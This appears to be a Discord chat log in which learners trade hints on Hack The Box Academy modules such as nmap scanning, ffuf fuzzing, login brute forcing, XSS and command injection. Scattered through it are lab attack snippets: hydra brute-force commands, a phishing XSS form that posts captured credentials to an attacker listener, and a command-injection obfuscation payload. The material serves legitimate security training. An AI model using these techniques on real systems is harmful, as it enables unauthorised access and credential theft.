#modules

ah 🙂

Yeah the T0 modules both cost 10 cubes and award a total of 10 cubes upon completion, so they are practically free granted you finish them

some of the paid ones are really good like a 🐍 certain 🐍 module 🐍 about 🐍 snakes 🐍 that I may or may not have made

:)))))

exactly. seeing that this could be a way to unlock more difficult modules I was like awesome, by finishing higher tier modules I'll get the cubes needed for more difficult ones to further play around

but now I understand that

ah yeah that would be awesome though

it would for sure

Hey could anyone help me out? I'm in 'Intercepting Web Requests' on module 'Using Web Proxies' trying to complete this problem, "Try intercepting the ping request on the server shown above, and change the post data similarly to what we did in this section. Change the command to read 'flag.txt'" I've intercepted the ping request but not sure where to go from there. Here's a picture

@mild kettle DM me.

anyone around for a nudge on windows privesc: credential hunting? I've found 4 passwords for "Search the file system for a file containing a password. Submit the password as your answer." and none of them are working - wanna make sure its not a bug

Im still having the issue of being able to ssh/rdp in from the parrot web browser vm to the target machine, i am pretty sure the password i am using is right, so i am not sure what i am doing wrong

terminal looks like this

[htb-ac56594@htb-ivdjwmpxyg]─[~]
└──╼ $ssh htb-student@10.129.42.254
The authenticity of host '10.129.42.254 (10.129.42.254)' can't be established.
ECDSA key fingerprint is SHA256:2C7i8PSisiFhZU6hKnk/uezTXBHtFMnXLJvuzKghmBU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.42.254' (ECDSA) to the list of known hosts.
htb-student@10.129.42.254's password:
Permission denied, please try again.
htb-student@10.129.42.254's password:

im trying this password for ssh

HTB_@cademy_stdnt!

Hey could some1 help me with NTA Module? im currently filtering with tcpdump and im stuck

Start HTB Academy

@supple rampart Start with these two modules within the Academy.

@jovial pivot Check https://phoenixnap.com/kb/ssh-permission-denied-publickey

What are you here for?

What for?

Yeah I did 😄 happy to hear you enjoyed it

for this question last part in the nmap module anybody knows how to find the version of the dns

oh damn we're both still on the grind

lmao

👀

someone help please
I run command "nmap -sV -n -Pn 10.129.239.172 -p8080" to complete module "Getting Started/Service Scan"
But result is missing version info?

Look into the man page of nmap. you'll find your answer there

Following #modules message.... I tried all the following combinations: tcpdump -c 1 -X icmp, tcpdump icmp, tcpdump -n icmp, and all that combination with sudo... but it does't work, could you give me a hint, please?

thanks for answer,
I try add all option "--version-all" but no change 😦
Command: "nmap -Pn --version-all 10.129.239.172 -p8080"

It's -sV

yes, i tried, but version still empty

I can't send image 😦

Hey, I'm also stuck with the skill assessment

Is it okay if I DM you? thanks

anyone have issues with academy targets failing to start? I'm trying to finish one with a docker target (i think? <public ip>:<port>) and can't even ping it. I've tried on and off the vpn, from a local parrot vm and from pwnbox. I've reset the target a couple times as well, nothing.

Sure

Hi, but are you talking about the attacker box in academy? I am not sure that you can login via ssh.

Need some help with "LOGIN BRUTE FORCING - Skills Assessment - Service Login" , I obtained the user from the second question in "Skills Assessment - Website". I used NameGenerator to create the possible user names and cupp to create a wordlist (refined results with company policy) but still havent been able to get the correct set of credentials. Any hints that yall could provide would be greatly appreciated

@frosty nacelle DM me.

Target spawning doesn't seem to work on the phishing section for the XSS module, been spinning for ten minutes at this point, I've refreshed the page 20 times now

Can someone give me an advise (not an answer) how to made that, i checked kernel vulns, checked cron as that was written previously, but found nothing

Perhaps indeed

😃

hi all - can anyone explain me what are they asking about - since the answer is not: MAC
"What addressing mechanism is used at the Link Layer of the TCP/IP model?"

It's from the "Networking Primer - Layers 1-4"

oh wait link is a combination of both data link and physical mb

Link layer is also sometimes called network interface layer

If you understand OSI you will understand TCP/IP

Just a condensed version of OSI

yes, because Link Layer is != network layer

it's TCP /IP not OSI

only 4 layers are in this model

I will delete my message to not confuse anyone

ok no problem

Had an interview for soc positions recently

I will hear back next week on whether i got the job

They asked me some crazy questions for an undergrad in CS

sometimes it's just to much to digest 😆

I think they were just gauging my level of knowledge

HR woman said I got good feedback so might be gud

Pray for me brothers

I will need it

ok - fingers crossed 🙂
getting back to my struggle

struggle bus leads to good places my friend

Hello Friends, I'm on the Setting Up Modulus in HTB Academy and I'm having a hard time setting up my VPS on Vultr. I followed all the step but whenever I tried to ssh using my parrot vm to the vps server I keep getting "ssh: connect to host IP port:22 Connection refused.

What should I do?

you are using open vpn?

No, I don't see any step mentioning that

mb nevermind

does anyone know where I can ask for help? im submitting a flag for a module's question but it says that its wrong.

that would prob be here, what module are you working on?

Weak Bruteforce Protections

oh sorry mb, I haven't done that one yet

thanks

Any nudge on this section?

Anyone able to gimme a nudge on the DNSAdmins section of Windows Privilege Escalation? Getting the DLL to work but no access to the flag…

Try having it do something different.

💡

anyone with some books of ffuf

google

okay but i was having a problem on submitting some answer on that model

How can I send a request with two arguments?

The vulnerable parameter doesn't change per target on the Session Hijacking of XSS does it?

um so my cookie keeps disappearing when I try to add it in

um nevermind... I was trying to change the domain to match, but i didn't have to

Has anyone completed the Setting up Module? I'm having a hard time setting up my VPS.

Yay I did it lol

If anyone needs help on the XSS module I just finished it so its fresh in my mind lol

Hi CarniGamer, I solved it, but it's a bit tricky to give hints. try to put console.log to all return values and integrate the unused functions

Hi I find the answer for a module question (I am in the ASsembly Intro course) But i don't know tthe format to validate my answer

Bufferoverflow linux .. Unable to read /root/flag.txt

I'm stuck at the Secure Coding 101:Javascript module at the Patching task... Can anyone help me?

Check DM

What’s this server abt?

hi, im on linux fundamentals->navigation, using the pwnbox, i tried to ssh to my target, but am not connecting.. any help please?

@warm bobcat Try doing it from your host machine and see if there is any luck.

it didnt work on my main machine, the error is related to compression on config or something, but am talking to htb help chat already thanks @main vapor ! 🙂

In the Getting Started module on the Service Scanning section I am having issues with this problem:

Perform an Nmap scan of the target. What service is running on port 8080? (two words)

┌─[htb-ac56594@htb-utlfbka3dn]─[~]
└──╼ $sudo nmap -p8080 10.129.42.254
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-15 15:27 UTC
Nmap scan report for 10.129.42.254
Host is up (0.0031s latency).

PORT STATE SERVICE
8080/tcp open http-proxy

Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds
┌─[htb-ac56594@htb-utlfbka3dn]─[~]
└──╼ $

those are the actions i took in the terminal, based off the question i would assume that the service on port 8080 is http-proxy; however, it states it is incorrect

i am a tad bit confused, can anyone tell me what i am doing wrong?

any help in understanding what i am doing wrong would be very appreciated

i figured that out, apparently i was being stupid, i didnt need to ssh into the target. I learned that i only need to ssh into a target when specifically given a username and password to do so, i appreciate the response

Skill assement bufferoverflow linux .. Got reverse shell but unable to read /root/flag.txt says permision denied. But the program has set suid ..after executing binary it saves ist argument in text file.

hey guys, anyone did BROKEN AUTHENTICATION > Predictable Reset Token ? im having a hard time creating a valid token but im not sure what im doing wrong.

Same problem here

it's because there is still something to gain from that port, perhaps you just don't see it?

h i guys I just finished Meow, Fawn, and dancing, what should :I do next

@pure vector @fleet moth feel free to DM / explain in here

try playing some of the retired machines

I dont have the money for VIP

and i think that requires VIP

the easy ones

some are free

After the tier 0 ones should I move to tier 1

for T1 modules you also need money

not sure if you've gone through academy yet but yeah...

next up you can go to labs/machines/retired

should be 3-5 recent ones that are free

@naive elbow

retired machines give you a walkthrough through them as well

sure

i have my python code which I believe its self explanatory

can I post it here or dm?

dm

Not always. Sometimes you'll have username and private key (RSA , etc.) then you will login via ssh user@IP -i privatekeyfile. I guess you already known that 🙂

Been stuck on an NMAP module for 4 days. It asked to find the total number of open TCP ports on my target. Tried and tried but couldn't get it until a new target was assigned today which gave me a clear answer.

anybody complete fuzz model

Hi, I've have problems with the xxe spawn machines on the "web attacks" module. I have finished the Skills Assessment but I'm stuck cause although the containers do start I can't reach them. I've tried ping it even nmap it but it looks like the container doesn't work. I don't know if I'm doing something wrong.

I don't want to get too specific here but, when making reference to a flag in the modules(NMAP). Are they referring to a segment of code in a page or to a returned value in a TCP scan such as SYN/ACK/RST? I'm confused because I tried multiple options but it doesn't work.

there's also the NMAP flag so I'm not sure which one to refer to.

@loud sparrow

Are there any plans for a Nessus module?
Good question. My guess is no since it's a paid product IIRC. There's an nmap module though if that helps

Hello, I have a problem with the spawn machine while using nmap ( telling me all ports are filtered) also while using smbclient (saying Error NT STATUS IO TIMEOUT)

Anyone else have a problem with the starting point where you've pawned tier 0 but it doesn't show it?

I've done dancing and meow but the last flag task just says 'this machine is already pwned' but it doesn't actually complete 9/9

Hey there ! I badly need help in academy's Bug Bounty Hunter Path

Anybody up?

There's a button that's disabled. And i need to enable it with burp and get the flag. Idk how but i played with the source code and somehow i got the flag. But tht was unexpected

I'm curious to know how the procedure is!

Anyone available to give a hint about Web Attaks skills assesment?

Which section you trying to solve

any ideas on what wordlist to use for this task

logın brute forcing module

if i recall correctly i created one with cupp

cool thanks

How can I send a web request with 2 arguments ?

I know how do the method GET but no with arguments...

@brazen saffron you mean POST?

or GET with 2 args?

GET with 2 args.

I know I can use curl URL but with args...

https://curl.se/docs/httpscripting.html

curl http://inlanefreight.com?param1=value1&param2=value2 with GET
or POST with -d (--data) flag

Wait I don't understand, I can do : curl http://inlanefreight.com/?param1=669&param2=668 ?

yup

Because I have it so...

Then I did it with my exercice but I don't know what I need to send in the answer :

If u send the curl, what do you get in response?

I send it.

The "code source" and a answer : + done with the ip, etc.

Check the content of the answer

I said to you...

@brazen saffron Why do you have a / before ?

I'm trying to help without giving you the answer 👀

Before it is the IP.

no my man your are doing this /flag.php/?param1=668&param2=669

why not ||/flag.php?param1=668&param2=669 my pardons to @brazen saffron but both work||

And are you sure they are called "param1" and "param2"?

||The author said "num1" and "num2".||..

erm that's the same as the previous message xD

oh nvm I see it now

Ah ok! Thanks.

I try.

I did it and..

@brazen saffron Are you sure that the target is up and running?

I re did and he send to me something.

Can I send to you in DMs to don't send an answer here?

@brazen saffron Sure.

Hey there ! I badly need help in academy's Bug Bounty Hunter Path
There's a button that's disabled. And i need to enable it with burp and get the flag. Idk how but i played with the source code and somehow i got the flag. But tht was unexpected
I badly want to know how the procedure is!

Use spoiler tag 👀

.

@inner breach Which module is that?

Bug bounty hunter path last section. I believe it is from the Web proxies module

https://academy.hackthebox.com/module/details/110

there u go! last section

@inner breach I am still to do that last section. So someone else might be able to help 😄

@inner breach I have solved it on the fly just for you. DM for instructions.

damn! cool!

I'm having trouble with the "Web Attacks"/"Advanced File Disclosure". I've tried to reproduce step by step the examples shown in the lesson, yet I don't get the same output. Plus I don't get how we should point to a specific file in the xxe.dtd . Anyone willing to offer help ?

yo should try with a known page as index. I found them but I require to reescan all possible folders because my findings miss something.

I think there is an option to retake module.

Hey guys, I am not sure how they connected to the bob user in the getting started module for smbclient

it keeps asking me for password but I obviously I cant write anything

for that employee, try starting with very little info + leet/nums etc then working up if those don't work

how do I get into hacking?

++academy

is there a free alternative like books? I don't want to pay subscriptions

Do the tier 0 modules. They are free

academy, google, tryhackme. There is a lot to cover.

DM Message me and I will point you in the right direction.

In the Results section of the "Setting up" course, is there a CLI alternative for the tools mentioned?

I'm stuck. Log in brute forcing module. Second question on the skill assessment. "Once you are in, you should find that another user exists in server. Try to brute force their login, and get their flag.". hint is to use the wordlist in the home directory. Which is rockyou-30.txt. I've tried it and I just get a server time out error. Any clue what I'm missing?

Maybe I'm being blind but in HTB Academy "Introduction to Python 3" "Word Extractor" "The First Iterations" the question at the end is "What is the 3rd most used word on the exercise target website?" The sample code uses 'http://target:port' which seems wrong, but I can't find a reference to any specific site in the module. I have working code, but without the correct URL I'm stuck. I assume that since others have made it through the module this is not a bug and I'm just missing something.
Can someone tell me the correct website and where I should have found it?

I haven't done that specific module but is there an option to "spawn target"?

@urban sage Thanks. I was being blind. I knew it was going to be something stupid.

No problem. Happy hacking!

Hello, i just started the "Attacking Web Applications with FFUF" module. In "Directory Fuzzing" section, it says:

But if i try this command, i get:

So i can't bind the "FUZZ" keyword to use it whenever i want. Is that normal?
(i'm using the wordlist of dirbuster, is that a problem?)

EDIT: yes, dirbuster's wordlist is the problem 😂

Feel free to ping me if you need any elaborations or any help with it 🙂 Hope you enjoy it!

Can i get some help with the SQL module on HTB Academy por favor?

What is the last name of the employee whose first name starts with "Bar" AND who was hired on 1990-01-01?

This is my question I am trying to answer^

SELECT * FROM table_name WHERE <condition>;

I am not sure how to properly use the syntax

I need to use the AND statement the hint says

@faint trout DM me.

anyone around for a nudge on windows privesc assessment 1? I've got my shell but cant seem to find the ldapadmin creds

Web Attacks - Skills Assessment

anybody doing login brute forcing

Bro I am there

how am I supposed to get the employee name

@mint karma the comments said that in the pass exercise we found a user

But I am there too

:(

lol I am confused

Yeah because there is not a clear explanation

xD

pretty vague

but got it

hey on the intro "What is the abreviated name for a tunnel interface in the output of your VPN boot-up sequence output? "

i'm not underatanding

i tried eth0 or tun0 no luck

not sure i understand the question?

I am connected via openvpn to the machine, on tun0 looks like? not sure what the correct answer would be or how to move toward it

oh

it wanted "tun" not "tun0"

weird

i think i misunderstood the question but shouldn't the interface be technically tun0 not tun? there is no interface called just "tun" in ifconfig

anyways for the intro is it intended the initial box has all ports filtered? I tried a -Pn scan and just got told all ports filtered but the next question asks about specific ports being open? (I tried dropping the -A flag and just doing nmap -Pn -v [ip of box] with no luck, but vpn is connected

like not even sure if the host is acting normally, is there a way to verify? can anyone give help?

not sure how to move towards solution

Is htb vip+ worth it? Trying finish all the module in academy before I considering it

It asks for a general interface, not your specific case. You can have more tunnel interfaces (tun0,1,...). The abreviated name is still|| tun||

thanks you're right

now stuck figuring how to nmap the box usual tricks aren't working :/

If you're using and liking the Pwnbox instance and you want unlimited access to all retired content, as well as a less crowded VPN for the active and popular content, I'd say it is

ping the target to see if it is up, then nmap --help to see the options, depending on what you need to check

If you're into learning on the Academy, you could also look at some of their Cube plans

Thanks, will do

So that's what's odd, it's up but not responding to ping? Here's the output:

err hold on running it

oh weird now it gave results

but looks like all filtered

yeah no matter how i try it says up but all ports filtered

In the Web Request - Request and Response module, is there a way to have the FoxyProxy extension not be disabled?

Or at least get it to activate using burp?

Hi bros i stuck in the LOGIN BRUTE FORCING-Skills Assessment second question " Once you are in, you should find that another user exists in server. Try to brute force their login, and get their flag." could you help me out?

I already have the other user and I have the list that is in the home (rockyou-30.txt). My question is how do I brute force from there which port should I use? I tried hydra -l useretc -P rockyou ... -u -f ssh: //127.0.0.1: 22 -t4. Or what IP and port should the attack launch? All my attempts mark my connection refused.

Thanks

I did last week.

isn't it weird that there is no loopback on port 21

thats the machine

Thanks for the response (Y)

anyone please give me a nudge in XSS skill assessment

please careful with spoilers, might censor certain information in this picture next time 🙂

What's the problem?

Can I dm you

Yeah

Anybody... Doing File Inclusion/Directory Traversal module. Currently on the Skill Accessment exercise. I have tried things like URL Brute using Gobuster and a few php wrappers. The one that worked for me is php://filter before I could use this wrapper I need to find the config file or something Gobuster could not locate any config files. I have tried different wordlists hoping to find a config file on the webserver nothing turn out. Please I need help.

Skill Accessement question is; Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.

@pearl birch DM me.

Need a sanity check in Windows Binary Exploitation: "Try to search the 'cdextract.exe' binary for the 'PUSH ESP; RET' instruction as pattern '54C3'. What is the address of the first result you get?" -- I have the three addresses where this is located, but it's not taking it.

@thorny crow DM me.

i want to learn hacking can anyone tell me from where to start

i have some knowledge on html

and javascript

hey guys, i'm stuck on a pretty simple skills assessment for ffuf module. I'm on "Parameter Fuzzing - GET" and can't get the paramter to come through from the command: ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://167.99.202.9:31395/?FUZZ=key

Can someone give me a nudge

I've tried this as well with no luck
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://167.99.202.9:31395/admin/admin.php?FUZZ=key

@thorny crow your are searching outside cdextract.exe . Double click cdextract.exe to find instruction inside it . Use pattern 54 C3 and u will get address

@thorny crow Submit this 00457418 i will explain u

Try not on 167.99.202.9, but it's subdomain if im not wrong

(admin.academy.htb, with academy.htb = 167.99.202.9, also admin.academy.htb)

hmmm, i added the ip to etc/hosts(sudo sh -c 'echo "167.99.202.9:31395 academy.htb" >> /etc/hosts') and ran this but still no luck:
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://167.99.202.9:31395/admin/admin.php?FUZZ=key -fs 968

You're adding only academy.htb to /etc/hosts

You need to add admin.academy.htb also

Then, you can use ffuf on http://admin.academy.htb

yeah, ive added both. running ffuf on admin.academy.htb and 167.99.202.9:31395 either return error or nothing

U're using in a wrong way the command sudo sh -c

From cheatsheet: "sudo sh -c 'echo "SERVER_IP academy.htb" >> /etc/hosts'"

Without the PORT. But now u need to access /etc/hosts and remove the wrong entries

I removed the entries. Added the IP with http://admin.academy.htb and http://academy.htb but running fffuf as:
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://academy.htb/admin/admin.php?FUZZ=key -fs 986
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://admin.academy.htb/admin/admin.php?FUZZ=key -fs 986

Both return no results

Sorry about this. really appreciate the help

Missing PORT in ffuf command
From cheatsheet: ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php?FUZZ=key -fs xxx

@cedar light helped me figure it out. I was adding http:// to the hostname in /etc/hosts

@pearl birch Hint : Use php wrappers on index file and u will find some interesting stuff

Hi
I am currently doing the Linux Fundamentals Module and the web machine doesn't seem to working

I am not able to ssh into the target machine, it displays connection timed out

Anyone who maybe be able to help me with this one ?

I did try downloading the vpn key but it seems to be showing some authentication error

Anybuddy have ark mobile hack tools

When it comes to catch subdomains / vhosts in this exercise, the first part is editing the /etc/hosts and add the suitable entries such as <ip> academy.htb <subdomain>.academy.htb <vhost>.academy.htb, etc. I guess you'll try several tries on each exercise. All of them are around academy.htb. So, add a line per each new IP with the same subdomains found. As I remember admin was not part of the subdomain. your first goals is ffuff by using any word list from dns folder of seclist.

That's the next part. He was at the example with admin.academy.htb to test the GET fuzz

Some on finished Attacking Common Applications-Attacking osTicket

mine took 5 mins to crack xD

Does anyone know when will the new Bug Bounty Hunter modules be published ?

inbox me

👍

hi

is there a python pwntools module planned?

Hello there again! Two days earlier i asked to give me a hint, but now i`m completely feeling dumb... I understand how to gain access to root from user2, but i cant reach user2

Module name ?

Privilege Escalation

You should look around sudo -l and sudo -u

Thanks

I got that)))

Thank you))

Your welcome 🙂

I cannot ping the target system in the FFuf module, any ideas? I can access other sites like google from my workstation

nvm

Thanks, can't wait 🙂

Of course !

Hey guys, Accepting DM's for help

I am looking to solve the HTB Academy SQLi fundamentals final assessment question.

I am stuck on creating a webshell and executing the search for root directory

I was running though the Intro to python, and during the managing libraries in python part, the question was #2 The type of foo from question 1 is <class 'set'>. What is the type of x_coordinate? Now i put made a text.py and put the code it and it came out tuple. But that isnt the correct answer... can anyone give me some help or a push in the right direction

@weary locust|| How about you use the type() function on the variable instead?||

I didn't check ping but you just try to connect with your browser or curl. ffuf is about web. The box should serve multiple instance of the same web in several ports.

hi

@main vapor i did and that is how I got the answer tuple but it does not accept that answer

@weary locust Check DM.

Hi! i'm trying Linux Local Privilege Escalation - Skills Assessment (the note: obtain a shell on the box instead using the ssh) anyone can send me a hint??

ty so much... im soooo slow.

Hi.
Some problem to spawn the vm ?
Target: Target is spawning...
Am alone ?

!rank

@pine sable Please use the bot in #bot-commands.

Yes sorry 😦

hi

anybody did this

hashcat module

hi, i have a rather general topic, i have both python2.7 and python3 installed on my kali linux machine, and it seems pip doesn't work for the 2.7 one. I can't find a way to manually install it. It always says: "/usr/bin/python2.7: No module named pip", but "sudo apt-get install python-pip" says: replaced by python3. Anybody knows what to do?

Try python -m ensurepip --upgrade

https://docs.python.org/3/library/ensurepip.html#module-ensurepip

Thank you! I tried it, but it leads me back to the same probelm:

ensurepip is disabled in Debian/Ubuntu for the system python.

Python modules For the system python are usually handled by dpkg and apt-get.

apt-get install python-<module name>

Install the python-pip package to use pip itself. Using pip together
with the system python might have unexpected results for any system installed
module, so use it on your own risk, or make sure to only use it in virtual
environments.

and when i try "sudo apt-get install python-pip" it says:

Package python-pip is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
However the following packages replace it:
python3-pip

E: Package 'python-pip' has no installation candidate

Python 2.7 is End Of Life - why do you need it still?

i want to run some PoC. actually i'm doing the "Common Web Applications" module now, and for example the Drupal section has some scripts i can't execute

some one on Common Web Applications: Skills Assessment I ?

Module: Network Traffic Analysis
Section: Interrogating Network Traffic With Capture and Display Filters
Question: What are the client and server port numbers used in first full TCP three-way handshake? (low number first then high number)

Where can i find the .pcap file that is necessary for this question?

There's a "Resources" button in the upper right

it should be among those files

Could use a hint here also

Nvm figured it out

was wondering if anyone wanted to study the Linux fundelementals module with me? just dm me if you want to (no voice chat). The reason for this is that I heard studying with someone else helps you remember info better.

anyone from philppines?

Hi

I am doing the web requests module

POST one

but I can't finish it

so can someone help me?

some random strings made me reach till here

I jus need the n

ant idea how to get it?

what is the encoding ?

@inland wigeon

yea

yea

@wary nymph

.

@cunning nacelle

-_-

why ping

i cant see burp in foxyproxy

add it

how?

i dont see it in the extension menu

hmm

restart firefox ?

i did

and burp

hm

nothing

options

ok

then?

enter a name

ip: 127.0.0.1 port 8080

click add

add proxy?

yea

click the add button

like this

the ip is 127.0.0.1

port 8080

give it a name

click save

it should work then ig

yea i got it thanks

np 😄

Web Attacks - Skills Assessment i'm stuck anyone can help please?

this was not clear to me, thanks!

does anyone know whether zap is installed by default on this instance?

I don't seem to find zap at all

why do you say "some random strings"?

Read again the previous sections, u didn't understand something

Just think about how the backend knows you are "admi"

Hello ! 🙂
Since yesterday, i can't spawn target VM.
message: Target: Target is spawning...
Am alone with this issue ?

https://academy.hackthebox.com/module/110

confused which wordlist to use
Burp Intruder

the hashcat module was fun

is there a wireless attack module coming to HTB?

Good question, I'm curious to know too.

In the hashcat module it says there will be

Mabye a matter of time

Anyone requiring help/hints for the Hashcat module I will be at your disposal.

I want to join, but no idea where to start 😂 Sorry

Is there VMware for mac? I'm on the 'Setting Up' Module and not sure which VMware to download

Hey could someone help me out I keep getting this message after having installed and reinstalled openvpn but I still get an error message that openvpn command not found

did you try to type the whole path: /usr/local/opt/openvpn/sbin/openvpn file.ovpn

or try to start the service like it suggests: sudo brew services restart openvpn

but to me it looks like your system doesn't find the correct path

tried the restart but it didn't work. How would I write that with the whole path, 'openvpn /usr/local/opt/openvpn/sbin/openvpn file.ovpn'?

'openvpn /usr/local/opt/openvpn/sbin/openvpn file.ovpn' didn't work

no need for the first openvpn, just this: /usr/local/opt/openvpn/sbin/openvpn file.ovp

your shell will find out that that this is a binary file 😆

hey guys

anyone did the Intro assembly module stuck on the first task at the last section !!Thanks:)

this happens because probably openvpn was installed at your user's bin and not the system bin

try using which openvpn as a normal user

I tried which openvpn and that seemed to work

what was the output?

also, it isn't good practice using sudo su, you'd rather use sudo $command

(afaik)

This is what I got

Ok whats the difference between sudo su and sudo $command

basically everything you do with while in su mode is executed with root privileges

you could execute something by accident idk

i've always heard that i shouldn't do that

this shows that openvpn isn't at your bin PATH

oh ok

try instead of reinstalling removing it and then installing it again

how do I remove it?

or download openvpn's binaries and add them to your path manually

i'm not sure about brew but it might be brew remove openvpn

or brew uninstall openvpn

I got this, not sure where to go for that though. I'm on a mac

I ran that

do as the error says, type that command

now open vpn should be removed

Now not sure where to install openvpn too now

How do I get it downloaded onto the system not the root

https://openvpn.net/community-downloads/

extract it and add then link it

with ln -s path/to/openvpn /usr/bin/openvpn

I downloaded it. How do I add and link it?

are those two separate commands?

And I am trying to get it to work with ParrotOS, I am in the setting up module in the Linux section

Anyone available to nudge me for the command injection skills assess? Iv got an injection up to the point I get permission denied when moving the flag.txt. So im close!

Nevermind i got it. Soon as i post i get it....

Anyone finished the Broken Authentication skills assessment that can give me a nudge?

I know the cookie algorithm but kinda hit a wall now

Noob question -
I am doing the skills assessment on the web fuzzing module. I found the vhosts and the extensions just fine, but I am having trouble finding the page that says 'You don't have access!'. I've only found two pages, /server-status and /courses/ . Server-status gives me a 403 and the default message, 'You don't have permission to access this resource'. I assume the hidden page is under /courses/ since 1) the hint tells me to do a recursive scan and 2) /courses gives me a 301 to /courses/ , so I assume there are some sub dirs somewhere under that.

Here are some of the things I've tried -

• added the vhosts to my /etc/hosts
• run recursive searches on all vhosts
• searched for all the extensions (w/ -e option)
• used the medium and big dir list

Example of a search that would turn up this hidden page-
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://faculty.academy.htb:$PORT/FUZZ -recursion -v -e .php,.phps,.php7

Question -
Am I on the right track thinking this hidden page is under /courses/ or am I barking up the wrong tree there? Any hints would be greatly appreciated.

edit: I should also mention that pages like http://faculty.academy.htb:30538/courses/index.phps exists and is forbidden but again gives the default 403 error and not the specific message in the question, 'You don't have access!'. Plus that isnt the answer :p

Nevermind, found it! It was there all along, I was just overlooking it.

hmm it's some encoding ? like asp.net thingy

It's an encoding, study again the module, it should be written. It's a pretty important aspect to learn

Hi all, I'm currently 3/4s the way through the 'Cross-Site Scripting (XSS)' module. On the 'Phishing' section, it requests that I start a netcat server to listen and capture the usernames and passwords on the phishing page. Trying to start the nc server fails (using the supplied command in the section) as the 'address is already in use'.

It's trying to listen on the tunnel address, and doing a netstat reveals that python is currently using port 80. Inspecting in 'ps aux' reveals it's running something called 'websockify' and unfortunately, killing the process terminates the attack box connection (which makes a lot of sense).

Has anyone seen this issue before? Is it a known problem? Or am I supposed to change the port that my payload uses for the phishing page? That seems like it shouldn't be the case for a 'beginner' module.

Any advice would be greatly appreciated 🙂

damn it! i wish i could help u! even i'm close to this. I took a long break else i would have completed this

Just change the port to any other port, and change it accordingly in the xss payload

😄 all good!

Thanks a lot, that makes a lot of sense, I guess the payload would be changed to: <form action=http://10.10.X.X:1234> then. Thanks for your help! I'll try it out 🙂

ok sir

Can confirm it worked by changing the port to 10.10.x.x:8080

it's base64 ig

it worked thnx

🙂

sorry cat

^^

hey. im in the NETWORK ENUMERATION WITH NMAP module and im doing the nmap scripting engine part. i've tried enumerating with -A -sC -script=http-enum but i get nothing only that NXT-DEFAULT-SERVICE or whatever. so i just wanted to go check what is on the port so i went to <ip>:31337 port and i see the flag but i get an error when i submit

any idea?

Module : Web Proxies
Section : Burp Intruder

i don't understand what wordlist to use. The alphanum-case.txt didn't work.

And the common.txt just sounds a mountain in the community edition

I don't remember this one exactly, but use ZAP instead.
If you understand how Burp intruder work, and you just want to gain some time, use ZAP 💁‍♂️

yeah but the question says "Use Burp Intruder" that's what hurts me more if i ignore burp

I just tested rn, and common.txt is the good wordlist. just wait few minutes. The page you are looking for is in 200 first line of the wordlist 😉

damn!!!!!!!!!!!

the community is just toooooooooooooo slow

thanks for the confirmation tho

less than 10 minutes is enough

u mean the 200th line? or the first 200 words?

the 200 first words

oh okay! cool ! thanks

btw, i just see some bug when filtering by status code in my burp.
Better to look at the length page i think.
Maybe this bug is only available in my instance

can u please say the solution.. my burp is just super slow

Are you sure to use correctly the burp intruder ?

yeah! i know how to use it! its just nothing...but i just hate the speed

intruder sucks

If you are using pwnBox, you just need 10 minutes. 10 minutes is nothing

nop m not using pwnbox

Okay lemme see if that works fast

You don't need to wait for the end of the word list.
Like i said before, you will found the answer in the 200 first request.

OOk

Hi, did you finish it? I'm stuck at the last question of both final skill assessment exercises

😦

Anyone who finished the Cracking Passwords with Hashcat Academy Module or is at ease with hashcat could help me ? 🙂
Please Dm me if you want to 🙂

Hi [Academy | Using Web Proxies] Repeated Requests - Can anyone give me a hint on how to do this? I know it is not in the same directory, but i cannot seem to find the "other flag". How was the problem solved? Thank!!!

Hi, what did you try? I think you can just try combinations of "pwd" or "ls ../.." to search all directories

Which step block you ?

in final assesment 1+2 always the last question - i think i know the correct web app but i don't know how to exploit it

can i send you a DM?

You can

Hi guys, did anyone have trouble with eyewitness at the beginning of the "Attacking Common Applications" module ? I installed it with both methods presented, used the exact commands shown to generate a report but it keeps giving errors.

Here's the error : "Process unexpectedly closed with status 1"

stuck on the same part, okay if i DM?

Good Afternoon, I am going through the ffuf module, and I am not sure if I am misunderstanding or what, but for the GET parameter fuzzing, I thought the -fc parameter at the end of a ffuf command would allow me to filter responses. But if I set -fc 401 I still get the terminal vomit from all the 200 responses. Am I misunderstanding how that parameter works?

OH! I figured it out, the filter parameter describes things that you don´t want to see, not things that you do want to see

I just did that part without any problem. If it helps you, I did with the HTB instance, for some reason my VM can't reach the spawn container on that module

I got the answer with a bit of guessing but I would've liked it to work on my vm. Maybe I should try with an HTB machine to see if the eyewitness install works on my VM. It seems to be a very useful tool.

What's strange too is that Aquatone worked.

for me it worked, on Kali Linux... i installed it with "sudo apt install eyewitness" and then i did nmap to get the xml file and feed that into eyewitness. "eyewitness --web -w web_discovery.xml -d inlanefreight_eyewitness "

I also had problems with this one. Put only very basic parameters in cupp, actually i think you don't even need to google.

That's what I've done too. Didn't work...

I actually figured it out, thanks for the response.

Hitting a roadblock on Attacking Common Applications Skill Assessment I, found the app, version, and found a vuln but stuck there. If anyone's willing to give a hint DM me

Could anybody help with SQLMap Essentials? Stuck on trying to get flag 3 in the 4th section

Weird, only worked when specifiying the url and not saving the http request to a file in case anybody else gets stuck there

You can shoot them an email. Other than that no. Any hacking to take it down would be illegal.

okayy thank u

Is anyone familiar with creating an html link that changes a string to something else. Its the HTML injection section under intro to web apps. I've tried variations of this but not exactly sure whats being asked: "<a href='https://46.101.23.188:31304/'><button> onclick="inputFunction()"Click Me</button></a>"

?? can i write someone pm

ok! i finished it

Command Injection Module: Advanced Command Obfuscation

$(a="WhOaMi";printf %s "${a,,}")
is mistyping

should be $(a="WhOaMi";printf %s "${a}")

Thank you !! I try "ls /.." and "cat /flag.txt". I find it........

